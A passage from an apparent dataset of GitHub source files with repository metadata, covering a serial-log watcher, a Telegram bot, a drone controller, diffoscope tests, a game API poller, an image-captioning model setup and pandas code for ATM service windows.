relays\")\nparser.add_argument('RELAY_PORT', type=int, help=\"port of the relays\")\n\nargs = parser.parse_args()\n\npower_cmd = \"command_relay.py %s %d %d\" % (args.RELAY_IP, args.RELAY_PORT, args.RELAY)\n\n\nrecipients = smtp_credentials.recipients\nme = smtp_credentials.mail\n\ndef send_mail(status, filename, line=\"\", reboot=False):\n\tcontent = \"%s occured on device %s:\\n%s\" % (status, filename, line)\n\tif reboot:\n\t\tcontent += \"\\nThe device is being rebooted.\"\n\tmsg = MIMEText(content)\n\tmsg['Subject'] = \"%s on device %s\" % (status, filename)\n\tmsg['To'] = \", \".join(recipients)\n\tmsg['From'] = me\n\tserver = smtplib.SMTP(smtp_credentials.server, smtp_credentials.port)\n\tserver.ehlo()\n\tserver.starttls()\n\tserver.login(smtp_credentials.login, smtp_credentials.password)\n\tserver.sendmail(me, recipients, msg.as_string())\n\tserver.quit()\n\ndef reboot_board():\n\tos.spawnvp(os.P_WAIT, 'command_relay.py', (power_cmd + \" off\").split())\n\ttime.sleep(5)\n\tos.spawnvp(os.P_WAIT, 'command_relay.py', (power_cmd + \" on\").split())\n\ndef timeout_detected(filename):\n\tif time.mktime(time.gmtime()) >= freeze_timeout + last_line:\n\t\tsend_mail(\"timeout of %ds\" % freeze_timeout, filename, reboot=True)\n\t\treboot_board()\n\n#Timeout in milli seconds before serial is considered frozen\ntimeout = 60 * 1000 * 10\n\n#Timeout in seconds before board is declared crashed\nfreeze_timeout = 60 * 30\nlast_line = time.mktime(time.gmtime())\nfirst_err = True\n\nboard_rebooted_re = re.compile('Hit any key to stop autoboot')\nreboot_templates = ['send stop command failed', 'Oops']\nmatching_templates = ['UBI.*err']\nmatching_res = []\nreboot_res = []\nfor matching_template in matching_templates:\n\tmatching_res.append(re.compile(matching_template))\n\nfor reboot_template in reboot_templates:\n\treboot_res.append(re.compile(reboot_template))\n\nserial = pexpect.spawn(\"tail -F %s\" % args.FILE, timeout=freeze_timeout)\npoll = select.poll()\npoll.register(serial, select.POLLIN)\n\nwhile True:\n\tpoll_ok = poll.poll(timeout)\n\tif not poll_ok:\n\t\ttimeout_detected(args.FILE)\n\t\tcontinue\n\n\ttry:\n\t\tline = serial.readline()\n\texcept pexpect.TIMEOUT:\n\t\ttimeout_detected(args.FILE)\n\t\tcontinue\n\n\tlast_line = time.mktime(time.gmtime())\n\tif board_rebooted_re.search(line):\n\t\tfirst_err = True\n\tfor matching_re in matching_res:\n\t\tmatch = matching_re.search(line)\n\t\tif match:\n\t\t\tif first_err:\n\t\t\t\tsend_mail(\"error\", args.FILE, line)\n\t\t\tfirst_err = False\n\t\t\tbreak\n\tif match:\n\t\tcontinue\n\tfor reboot_re in reboot_res:\n\t\tmatch = reboot_re.search(line)\n\t\tif match:\n\t\t\tif first_err:\n\t\t\t\tsend_mail(\"error\", args.FILE, line, True)\n\t\t\t\treboot_board()\n\t\t\tfirst_err = False\n\t\t\tbreak\n\n\nsys.exit(0)\n","repo_name":"bbrezillon/ntc-test-automation","sub_path":"log_parser.py","file_name":"log_parser.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12371603899","text":"import os\n\nfrom vars import var\n\nfrom pyrogram import Client, idle\n\n\n\nlogging.getLogger(\"pyrogram\").setLevel(logging.INFO)\n\nTgraph = Client(\n \"Telegra.ph Uploader\",\n api_id=var.API_ID,\n api_hash=var.API_HASH,\n bot_token=var.BOT_TOKEN,\n plugins=dict(root=\"plugins\"),\n)\n\n\n\n\nTgraph.start()\nuname = (Tgraph.get_me()).username\nprint(f\"@{uname} Deployed Successfully !\")\n\nidle()\n\n\n\n","repo_name":"Captainamarica/NightVission-Telegrapbot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29992892657","text":"\ndef soroban(frame):\n for i in range(len(frame)):\n frame[i] = frame[i][::-1]\n ans = 0\n power = 1\n for elem in frame[0]:\n if elem == '|':\n # '5-bead' is active:\n ans += 5 * power\n power *= 10\n power = 1\n for col in range(len(frame[0])):\n cnt = 0\n idx = 3\n while idx < len(frame) and frame[idx][col] == 'O':\n cnt += 1\n idx += 1\n ans += cnt * power\n power *= 10\n return ans\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"ivSPJNgW4ChfbrKbR_20.py","file_name":"ivSPJNgW4ChfbrKbR_20.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17224858857","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 27 08:49:45 2020\n\n@author: Angel Ayala \n\"\"\"\nimport numpy as np\n\nfrom webots_drone.utils import bytes2image\n\n\nclass Drone:\n \"\"\"The Drone class manage each sensor and actuators of the drone.\n\n It is developed for the Mavic 2 Pro drone, it consists of GPS, IMU, Gyro,\n Compass, Camera, LED and Motor nodes.\n This drone control unit is designed to stabilize the drone through 4 PID\n controllers tunned for a 8ms simulation timestep, and the drone's gimbal\n with a Damping node in the WorldInfo node with values of 0.5 for both\n angular and linear fields.\n\n :param integer timestep: The simulation timestep, 8ms mus be setted,\n unexpected behaviour can occur with a different value.\n :param string name: A name for the controller, just for debug purpose.\n :param float start_alt: The initial altitude to be reached.\n \"\"\"\n\n def __init__(self, robot):\n # Time helpers\n self.time_counter = 0\n\n # Variables\n self.lift_thrust = 68.5 # with this thrust, the drone lifts.\n self.init_dist_sensors(robot, int(robot.getBasicTimeStep()))\n self.init_devices(robot, int(robot.getBasicTimeStep()))\n self._position = np.array([0.0, 0.0, 0.0])\n\n def init_dist_sensors(self, drone_node, timestep):\n \"\"\"Initialize each sensor distance of the Mavic 2 Pro.\n\n :param drone_node Robot: The instantiated Robot Node class.\n :param integer timestep: The simulation timestep, 8ms mus be setted,\n unexpected behaviour can occur with a different value.\n \"\"\"\n self.sensors_id = ['front left dist sonar',\n 'front right dist sonar',\n 'rear top dist sonar',\n 'rear bottom dist sonar',\n 'left side dist sonar',\n 'right side dist sonar',\n 'down front dist sonar',\n 'down back dist sonar',\n 'top dist infrared']\n # instantiate distance sensors\n self.sensors = list()\n for sid in self.sensors_id:\n sensor = drone_node.getDevice(sid)\n sensor.enable(timestep)\n self.sensors.append(sensor)\n\n return True\n\n def init_devices(self, drone_node, timestep):\n \"\"\"Initialize each device of the Mavic 2 Pro, in a desired timestep.\n\n The camera node is initialized at 33ms timestep to reach ~30fps.\n\n :param drone Robot: The instantiated Robot Node class.\n :param integer timestep: The simulation timestep, 8ms mus be setted,\n unexpected behaviour can occur with a different value.\n \"\"\"\n # Position coordinates [X, Y, Z]\n self.gps = drone_node.getDevice(\"gps\")\n self.gps.enable(timestep)\n # Angles respect global coordinates [roll, pitch, yaw]\n self.imu = drone_node.getDevice(\"inertial unit\")\n self.imu.enable(timestep)\n # Acceleration angles [roll, pitch, yaw]\n self.gyro = drone_node.getDevice(\"gyro\")\n self.gyro.enable(timestep)\n # Direction degree with north as reference\n self.compass = drone_node.getDevice(\"compass\")\n self.compass.enable(timestep)\n\n # Video acquisition\n fps = 25\n self.camera = drone_node.getDevice(\"camera\")\n self.camera_rate = 1000 // fps\n self.camera.enable(self.camera_rate)\n\n # LEDS\n self.leds = [\n drone_node.getDevice(\"front left led\"),\n drone_node.getDevice(\"front right led\")\n ]\n\n # Gimbal\n self.camera_roll = drone_node.getDevice(\"camera roll\")\n self.camera_pitch = drone_node.getDevice(\"camera pitch\")\n\n # Motors\n self.motors_id = ['front left propeller',\n 'front right propeller',\n 'rear left propeller',\n 'rear right propeller']\n self.motors = list()\n for mid in self.motors_id:\n motor = drone_node.getDevice(mid)\n motor.setPosition(float('inf'))\n motor.setVelocity(1.)\n self.motors.append(motor)\n\n return True\n\n def blink_leds(self):\n \"\"\"Blink the LED nodes.\"\"\"\n led_state = int(self.time_counter) % 2\n self.leds[0].set(led_state)\n self.leds[1].set(int(not led_state))\n\n def gimbal_stabilize(self):\n \"\"\"Stabilize camera (gimbal).\"\"\"\n acceleration = self.gyro.getValues()\n self.camera_roll.setPosition(-0.115 * acceleration[0])\n self.camera_pitch.setPosition(-0.1 * acceleration[1])\n\n def get_odometry(self):\n \"\"\"Get the drone's current acceleration, angles and position.\"\"\"\n orientation = self.imu.getRollPitchYaw()\n angular_velocity = self.gyro.getValues()\n position = self.gps.getValues()\n speed = self.gps.getSpeedVector()\n compass = self.compass.getValues()\n north_rad = np.arctan2(compass[0], compass[1])\n\n return orientation, angular_velocity, position, speed, north_rad\n\n def get_image(self):\n \"\"\"Get the Camera node image with size and channels.\n\n :return the data image with BGRA values\n \"\"\"\n camera_image = None\n if self.camera.getImage():\n camera_image = bytes2image(self.camera.getImage(),\n self.get_camera_image_shape())\n return camera_image\n\n def get_dist_sensors(self):\n \"\"\"Get the Distance sensors Nodes' measurements.\"\"\"\n sensors = dict()\n for i, sensor_name in enumerate(self.sensors_id):\n dist_sensor = self.sensors[i]\n sensors[sensor_name] = [dist_sensor.getValue(),\n dist_sensor.getMinValue(),\n dist_sensor.getMaxValue()]\n return sensors\n\n def get_camera_image_shape(self):\n \"\"\"Get the camera image dimension and channels.\"\"\"\n return (self.camera.getHeight(), self.camera.getWidth(), 4) # channels\n\n def set_motors_velocity(self, fl_motor, fr_motor, rl_motor, rr_motor):\n \"\"\"Set the drone's motor velocity.\"\"\"\n # Actuate over the motors\n if not np.isnan(fl_motor):\n self.motors[0].setVelocity(self.lift_thrust + fl_motor)\n self.motors[1].setVelocity(-(self.lift_thrust + fr_motor))\n self.motors[2].setVelocity(-(self.lift_thrust + rl_motor))\n self.motors[3].setVelocity(self.lift_thrust + rr_motor)\n","repo_name":"angel-ayala/gym-webots-drone","sub_path":"controllers/drone_controller/drone.py","file_name":"drone.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1001993413","text":"def q1(inputString):\n if len(inputString) < 2:\n print('There is no third largest integer for this input.')\n return\n #print the largest letter from the string\n currentIndex = 0\n currentMaxChar = 'a'\n currentSecondMaxChar = 'a'\n currentThirdMaxChar = 'a'\n while currentIndex < len(inputString):\n currentChar = inputString[currentIndex]\n if (currentChar.lower() > currentMaxChar):\n currentMaxChar = currentChar\n currentSecondMaxChar = currentMaxChar\n if (currentChar < currentMaxChar):\n currentSecondMaxChar = currentChar\n currentThirdMaxChar = currentSecondMaxChar\n if (currentChar < currentSecondMaxChar):\n currentThirdMaxChar = currentSecondMaxChar\n currentIndex = currentIndex + 1\n\n maxLetterCount = 0\n for a in inputString:\n count = 0\n for b in inputString:\n if(a == b):\n count = count + 1\n if(count > maxLetterCount):\n maxLetterCount = count\n repeatLetter = a\n print('In {}, the largest letter is {}, the third largest letter is {}, and the most common letter is {}, occuring {} times.'.format(inputString,currentMaxChar,currentThirdMaxChar,repeatLetter,maxLetterCount))\n return\n","repo_name":"nihaal-gill/Example-Coding-Projects","sub_path":"Working with Strings/Strings.py","file_name":"Strings.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28468405102","text":"import os.path\nimport shutil\nimport pytest\nfrom diffoscope.comparators import specialize\nfrom diffoscope.comparators.binary import FilesystemFile, NonExistingFile\ntry:\n from diffoscope.comparators.debian import DotChangesFile, DotDscFile\n miss_debian_module = False\nexcept ImportError:\n from diffoscope.comparators.debian_fallback import DotChangesFile, DotDscFile\n miss_debian_module = True\nfrom diffoscope.config import Config\nfrom diffoscope.presenters.text import output_text\n\nTEST_DOT_CHANGES_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.changes')\nTEST_DOT_CHANGES_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.changes')\nTEST_DEB_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.deb')\nTEST_DEB_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.deb')\n\n@pytest.fixture\ndef dot_changes1(tmpdir):\n tmpdir.mkdir('a')\n dot_changes_path = str(tmpdir.join('a/test_1.changes'))\n shutil.copy(TEST_DOT_CHANGES_FILE1_PATH, dot_changes_path)\n shutil.copy(TEST_DEB_FILE1_PATH, str(tmpdir.join('a/test_1_all.deb')))\n return specialize(FilesystemFile(dot_changes_path))\n\n@pytest.fixture\ndef dot_changes2(tmpdir):\n tmpdir.mkdir('b')\n dot_changes_path = str(tmpdir.join('b/test_1.changes'))\n shutil.copy(TEST_DOT_CHANGES_FILE2_PATH, dot_changes_path)\n shutil.copy(TEST_DEB_FILE2_PATH, str(tmpdir.join('b/test_1_all.deb')))\n return specialize(FilesystemFile(dot_changes_path))\n\ndef test_dot_changes_identification(dot_changes1):\n assert isinstance(dot_changes1, DotChangesFile)\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_invalid(tmpdir):\n tmpdir.mkdir('a')\n dot_changes_path = str(tmpdir.join('a/test_1.changes'))\n shutil.copy(TEST_DOT_CHANGES_FILE1_PATH, dot_changes_path)\n # we don't copy the referenced .deb\n identified = specialize(FilesystemFile(dot_changes_path))\n assert not isinstance(identified, DotChangesFile)\n\ndef test_dot_changes_no_differences(dot_changes1):\n difference = dot_changes1.compare(dot_changes1)\n assert difference is None\n\n@pytest.fixture\ndef dot_changes_differences(dot_changes1, dot_changes2):\n difference = dot_changes1.compare(dot_changes2)\n output_text(difference, print_func=print)\n return difference.details\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_description(dot_changes_differences):\n assert dot_changes_differences[0]\n expected_diff = open(os.path.join(os.path.dirname(__file__), '../data/dot_changes_description_expected_diff')).read()\n assert dot_changes_differences[0].unified_diff == expected_diff\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_internal_diff(dot_changes_differences):\n assert dot_changes_differences[2].source1 == 'test_1_all.deb'\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_compare_non_existing(monkeypatch, dot_changes1):\n monkeypatch.setattr(Config.general, 'new_file', True)\n difference = dot_changes1.compare(NonExistingFile('/nonexisting', dot_changes1))\n output_text(difference, print_func=print)\n assert difference.source2 == '/nonexisting'\n assert difference.details[-1].source2 == '/dev/null'\n\nTEST_DOT_DSC_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.dsc')\nTEST_DOT_DSC_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.dsc')\nTEST_DEB_SRC1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.debsrc.tar.gz')\nTEST_DEB_SRC2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.debsrc.tar.gz')\n\n@pytest.fixture\ndef dot_dsc1(tmpdir):\n tmpdir.mkdir('a')\n dot_dsc_path = str(tmpdir.join('a/test_1.dsc'))\n shutil.copy(TEST_DOT_DSC_FILE1_PATH, dot_dsc_path)\n shutil.copy(TEST_DEB_SRC1_PATH, str(tmpdir.join('a/test_1.tar.gz')))\n return specialize(FilesystemFile(dot_dsc_path))\n\n@pytest.fixture\ndef dot_dsc2(tmpdir):\n tmpdir.mkdir('b')\n dot_dsc_path = str(tmpdir.join('b/test_1.dsc'))\n shutil.copy(TEST_DOT_DSC_FILE2_PATH, dot_dsc_path)\n shutil.copy(TEST_DEB_SRC2_PATH, str(tmpdir.join('b/test_1.tar.gz')))\n return specialize(FilesystemFile(dot_dsc_path))\n\ndef test_dot_dsc_identification(dot_dsc1):\n assert isinstance(dot_dsc1, DotDscFile)\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_dsc_invalid(tmpdir, dot_dsc2):\n tmpdir.mkdir('a')\n dot_dsc_path = str(tmpdir.join('a/test_1.dsc'))\n shutil.copy(TEST_DOT_CHANGES_FILE1_PATH, dot_dsc_path)\n # we don't copy the referenced .tar.gz\n identified = specialize(FilesystemFile(dot_dsc_path))\n assert not isinstance(identified, DotDscFile)\n\ndef test_dot_dsc_no_differences(dot_dsc1):\n difference = dot_dsc1.compare(dot_dsc1)\n assert difference is None\n\n@pytest.fixture\ndef dot_dsc_differences(dot_dsc1, dot_dsc2):\n difference = dot_dsc1.compare(dot_dsc2)\n output_text(difference, print_func=print)\n return difference.details\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_dsc_internal_diff(dot_dsc_differences):\n assert dot_dsc_differences[1].source1 == 'test_1.tar.gz'\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_dsc_compare_non_existing(monkeypatch, dot_dsc1):\n monkeypatch.setattr(Config.general, 'new_file', True)\n difference = dot_dsc1.compare(NonExistingFile('/nonexisting', dot_dsc1))\n output_text(difference, print_func=print)\n assert difference.source2 == '/nonexisting'\n assert difference.details[-1].source2 == '/dev/null'\n","repo_name":"edolstra/diffoscope","sub_path":"tests/comparators/test_debian.py","file_name":"test_debian.py","file_ext":"py","file_size_in_byte":5741,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"73773737691","text":"\"\"\"multisearch URL Configuration\n\nConfigure URL for endpoints:\n/site/\n/site/:site_id/\n/search/:site_id?term=foo\n\"\"\"\n\n\nfrom django.conf.urls import url\nfrom .views.api import (\n search,\n sites,\n site,\n)\n\n\nurlpatterns = [\n url(r'^search/(?P\\w+).*$', search, name=\"search\"),\n url(r'^site/$', sites, name=\"sites\"),\n url(r'^site/(?P\\w+)/$', site, name=\"site\"),\n]","repo_name":"jdeveloperw/multisearch","sub_path":"server/multisearch/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"27298147498","text":"import requests\nimport threading, time\nimport GLOBAL_CONFIG\nDEBUG_LOG = False\n\nAPI_KEY = GLOBAL_CONFIG.API_KEY\nAPI_FACTION_ID = \"36134\"\nAPI_CHAIN_REQUEST_URL = \"https://api.torn.com/faction/%s?selections=chain&key=%s\" % (API_FACTION_ID, API_KEY)\nAPI_FACTION_REQUEST_URL = \"https://api.torn.com/faction/%s?selections=&key=%s\" % (API_FACTION_ID, API_KEY)\nAPI_REQUEST_TIME_INTERVAL = 5\n\nsession = requests.session()\nif GLOBAL_CONFIG.USE_PROXIES:\n session.proxies = GLOBAL_CONFIG.proxies\n\nfaction_name = \"\"\nchain_current = -1\nchain_max = -1\nchain_timeout = -1\nchain_last_update_timestamp = -1\n\n\ndef debug_log_chain_state():\n if DEBUG_LOG:\n print(chain_current, chain_max, chain_timeout)\n\n\ndef chain_detail_info_make() -> str:\n return 'faction: %s\\n当前chain: %d\\n最大chain: %d\\n剩余时间: %d秒\\n预估剩余时间:%d秒\\n距离上次更新已过去:%d秒' % (faction_name, chain_current, chain_max, chain_timeout, (chain_timeout - (time.time()-chain_last_update_timestamp)), time.time()-chain_last_update_timestamp)\n\n\ndef chain_simple_info_make() -> str:\n return '当前chain: %d\\n最大chain: %d\\n预估剩余时间:%d' % ( chain_current, chain_max, (chain_timeout - (time.time()-chain_last_update_timestamp)))\n\n\ndef update_faction_state():\n global faction_name\n r = requests.get(API_FACTION_REQUEST_URL).json()\n try:\n faction_name = r[\"name\"]\n except Exception as e:\n faction_name = \"\"\n\n\ndef update_chain_state():\n global chain_current, chain_max, chain_timeout, chain_last_update_timestamp\n r = session.get(API_CHAIN_REQUEST_URL).json()\n try:\n new_chain_current = r[\"chain\"][\"current\"]\n new_chain_max = r[\"chain\"][\"max\"]\n new_chain_timeout = r[\"chain\"][\"timeout\"]\n new_chain_timestamp = -1\n\n if (new_chain_current != chain_current) or (new_chain_max != chain_max) or (new_chain_timeout != chain_timeout):\n # 有新信息 更新last_update_timestamp\n new_chain_timestamp = time.time()\n else:\n # 没有新信息 不更新last_update_timestamp\n new_chain_timestamp = chain_last_update_timestamp\n\n chain_current = new_chain_current\n chain_max = new_chain_max\n chain_timeout = new_chain_timeout\n chain_last_update_timestamp = new_chain_timestamp\n\n except Exception as e:\n chain_current = -1\n chain_max = -1\n chain_timeout = -1\n chain_last_update_timestamp = -1\n\n\ndef api_life_cycle():\n while 1:\n try:\n if faction_name == \"\":\n update_faction_state()\n update_chain_state()\n debug_log_chain_state()\n except Exception as e:\n print(e)\n print('api.center.heartbeat')\n time.sleep(API_REQUEST_TIME_INTERVAL)\n\n\ndef commence_life_cycle():\n # 不要多次调用\n thread = threading.Thread(target=api_life_cycle)\n thread.start()","repo_name":"mirrorsysu/iTorn_source","sub_path":"torn/APICenter.py","file_name":"APICenter.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"11670794425","text":"\"\"\"Model and feature extraction logic.\"\"\"\nfrom omegaconf import DictConfig\nfrom transformers import (GPT2Tokenizer, PreTrainedModel, PreTrainedTokenizer,\n VisionEncoderDecoderModel, ViTFeatureExtractor)\n\n\ndef get_feature_extractor(\n pretrained_feature_extractor: str,\n) -> ViTFeatureExtractor:\n \"\"\"Get a pretrained ViT feature extractor by the given name.\n\n Args:\n pretrained_feature_extractor: The pretrained ft name.\n\n Returns:\n The pretrained feature ViT extractor.\n \"\"\"\n return ViTFeatureExtractor.from_pretrained(\n pretrained_feature_extractor,\n )\n\n\ndef get_tokenizer(\n pretrained_tokenizer: str,\n) -> GPT2Tokenizer:\n \"\"\"Get a pretrained GPT2 tokenizer by the given name.\n\n Args:\n pretrained_tokenizer: The pretrained tokenizer name.\n\n Returns:\n The pretrained GPT2 tokenizer.\n \"\"\"\n tokenizer = GPT2Tokenizer.from_pretrained(\n pretrained_tokenizer, use_fast=True,\n )\n tokens_to_add = {\n 'pad_token': '[PAD]',\n 'bos_token': '[BOS]',\n 'eos_token': '[EOS]',\n }\n tokenizer.add_special_tokens(tokens_to_add)\n return tokenizer\n\n\ndef get_model(\n pretrained_encoder: str,\n pretrained_decoder: str,\n tokenizer: PreTrainedTokenizer,\n config: DictConfig,\n) -> PreTrainedModel:\n \"\"\"Get and configure a pretrained EncoderDecoder model.\n\n Args:\n pretrained_encoder: Pretrained encoder name.\n pretrained_decoder: Pretrained decoder name.\n tokenizer: Pretrained tokenizer for encoder.\n config: Model configuration.\n\n Returns:\n VisionEncoder decoder from pretrained parts with applied configuration.\n \"\"\"\n model = VisionEncoderDecoderModel.from_encoder_decoder_pretrained(\n pretrained_encoder, pretrained_decoder,\n )\n\n model.config.decoder_start_token_id = tokenizer.bos_token_id\n model.config.bos_token_id = tokenizer.bos_token_id\n model.config.pad_token_id = tokenizer.pad_token_id\n model.config.eos_token_id = tokenizer.eos_token_id\n\n model.decoder.resize_token_embeddings(len(tokenizer))\n model.config.vocab_size = model.config.decoder.vocab_size\n\n model.config.max_length = config.max_length\n model.config.num_beams = config.num_beams\n model.config.num_beam_groups = config.num_beam_groups\n model.config.early_stopping = config.early_stopping\n model.config.no_repeat_ngram_size = config.no_repeat_ngram_size\n model.config.length_penalty = config.length_penalty\n model.config.repetition_penalty = config.repetition_penalty\n model.config.diversity_penalty = config.diversity_penalty\n\n return model\n","repo_name":"EgSergeenko/product-images-captioning","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11937636964","text":"import datetime as dt\nimport time as tm\n\nimport numpy as np\nimport pandas as pd\nfrom pandas import Series\nfrom pandas.core.frame import DataFrame\nfrom progressbar import ProgressBar\n\nimport project.date_range as dr\nfrom project.pd import df_cartesian\nfrom project.pd.datasource.orcl import DataFrameReaderOrcl\nimport project.atmserv.typ as typ\n\n\ndef get_order_day(df_order, df_day):\n df = df_cartesian(df_order, df_day)\n return df.loc[(df.DATE_REG <= df.DAY) & (df.DAY <= df.DATE_END)]\n\n\ndef set_group_func(df, series, col_name, func):\n\n for item in series.unique():\n cond = series == item # Булев массив для каждого уникального значения\n df.loc[cond, col_name] = func(item)\n\n\ndef get_in_repair(df_atm_order):\n i = 0\n in_repair_list = []\n grp_atm_order = df_atm_order.groupby(['ATM_REF', 'DAY', 'SW_BEG', 'SW_END'])[['DATE_REG', 'DATE_END']]\n bar = ProgressBar(max_value=len(grp_atm_order.size())).start()\n for (atm_ref, day, sw_beg, sw_end), grp in grp_atm_order:\n\n i += 1\n in_repair_day = []\n for order in grp.itertuples():\n\n (beg, end) = dr.inner_join([(sw_beg, sw_end), (order.DATE_REG, order.DATE_END)])\n if None not in [beg, end]:\n in_repair_day.append((beg, end))\n\n if i % 100 == 0:\n bar.update(i)\n\n in_repair_list.extend([(atm_ref, day, sw_beg, sw_end, *item) for item in dr.outer_join(in_repair_day) if item is not None])\n\n bar.finish()\n\n df_in_repair = pd.DataFrame(\n in_repair_list,\n columns=['ATM_REF', 'DAY', 'SW_BEG', 'SW_END', 'REPAIR_BEG', 'REPAIR_END']\n )\n\n # df_in_repair['REPAIR_TIME'] = df_in_repair['REPAIR_END'] - df_in_repair['REPAIR_BEG']\n\n return df_in_repair\n\n\ndef get_service_window(df_atm, df_day):\n\n def time_to_td(time):\n return pd.Timedelta(hours=time.hour, minutes=time.minute)\n\n set_group_func(df_atm, df_atm.A_TIME_BEG, 'TD_SERVICE_BEG', time_to_td) # Timedelta от начала суток до начала обслуживания\n set_group_func(df_atm, df_atm.A_TIME_END, 'TD_SERVICE_END', time_to_td) # Timedelta от начала суток до окончания обслуживания\n\n # Рачет режима обслуживания по условиям дней недели\n df_atm_wd = df_cartesian(df_atm, pd.DataFrame({'WEEKDAY': [1, 2, 3, 4, 5, 6, 7]})) #.set_index(['ATM_REF', 'WEEKDAY'], False)\n cond = df_atm_wd.WEEKDAY > df_atm_wd.A_DAYS\n df_atm_wd.loc[cond, 'TD_SERVICE_BEG'] = pd.to_timedelta(0)\n df_atm_wd.loc[cond, 'TD_SERVICE_END'] = pd.to_timedelta(0)\n\n # Режим доступности УС сводится к двум полям (AVAIL_BEG и AVAIL_END) в разрезе недель\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 1, 'TIME_AVAIL_BEG'] = df_atm_wd.MON_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 1, 'TIME_AVAIL_END'] = df_atm_wd.MON_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 2, 'TIME_AVAIL_BEG'] = df_atm_wd.TUE_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 2, 'TIME_AVAIL_END'] = df_atm_wd.TUE_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 3, 'TIME_AVAIL_BEG'] = df_atm_wd.WED_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 3, 'TIME_AVAIL_END'] = df_atm_wd.WED_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 4, 'TIME_AVAIL_BEG'] = df_atm_wd.THU_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 4, 'TIME_AVAIL_END'] = df_atm_wd.THU_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 5, 'TIME_AVAIL_BEG'] = df_atm_wd.FRI_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 5, 'TIME_AVAIL_END'] = df_atm_wd.FRI_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 6, 'TIME_AVAIL_BEG'] = df_atm_wd.SAT_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 6, 'TIME_AVAIL_END'] = df_atm_wd.SAT_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 7, 'TIME_AVAIL_BEG'] = df_atm_wd.SUN_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 7, 'TIME_AVAIL_END'] = df_atm_wd.SUN_END\n\n set_group_func(df_atm_wd, df_atm_wd.TIME_AVAIL_BEG, 'TD_AVAIL_BEG', time_to_td)\n set_group_func(df_atm_wd, df_atm_wd.TIME_AVAIL_END, 'TD_AVAIL_END', time_to_td)\n\n # Получение данных в разрезе дней\n # df_atm_sw = pd.merge(df_atm_wd, df_day, 'outer', on='WEEKDAY').set_index(['ATM_REF', 'DAY'], False).sort_index()\n df_atm_sw = pd.merge(df_atm_wd, df_day, on='WEEKDAY').set_index(['ATM_REF', 'DAY'], False).sort_index()\n # print(df_atm_sw.info())\n\n # Приведение к datetime\n df_atm_sw['SERVICE_BEG'] = df_atm_sw.DAY + df_atm_sw.TD_SERVICE_BEG\n df_atm_sw['SERVICE_END'] = df_atm_sw.DAY + df_atm_sw.TD_SERVICE_END\n df_atm_sw['AVAIL_BEG'] = df_atm_sw.DAY + df_atm_sw.TD_AVAIL_BEG\n df_atm_sw['AVAIL_END'] = df_atm_sw.DAY + df_atm_sw.TD_AVAIL_END\n\n # Обединение режимов обслуживания и доступности\n cond = df_atm_sw['AVAIL_BEG'] > df_atm_sw['SERVICE_BEG']\n df_atm_sw.loc[cond, 'SW_BEG'] = df_atm_sw.loc[cond, 'AVAIL_BEG']\n df_atm_sw.loc[~cond, 'SW_BEG'] = df_atm_sw.loc[~cond, 'SERVICE_BEG']\n\n cond = df_atm_sw['AVAIL_END'] < df_atm_sw['SERVICE_END']\n df_atm_sw.loc[cond, 'SW_END'] = df_atm_sw.loc[cond, 'AVAIL_END']\n df_atm_sw.loc[~cond, 'SW_END'] = df_atm_sw.loc[~cond, 'SERVICE_END']\n\n cond = df_atm_sw['SERVICE_BEG'] >= 